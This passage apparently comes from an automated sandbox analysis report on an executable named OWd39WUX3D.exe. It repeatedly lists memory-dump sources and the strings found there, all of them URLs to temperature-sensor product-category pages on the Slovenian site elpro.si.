              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/cryo-temp-temperaturna-tipala-za-z
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/digital-temperaturna-tipala/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/dodatna-oprema-za-temperaturna-tip
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/ex-temperaturna-tipala-z-atex-cert
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/field-mounted-temperaturna-tipala/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/high-temp-temperaturna-tipala-za-v
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/industry-temperaturna-tipala/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/industry-temperaturna-tipala/tempe
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/kanalska-temperaturna-tipala/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/mims-temperaturna-tipala/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/nastavljiva-temperaturna-tipala-2/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/on-site-cal-temperaturna-tipala/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/povrsinska-temperaturna-tipala/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/prenosna-temperaturna-tipala/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/temperaturna-tipala-predhodna-sifr
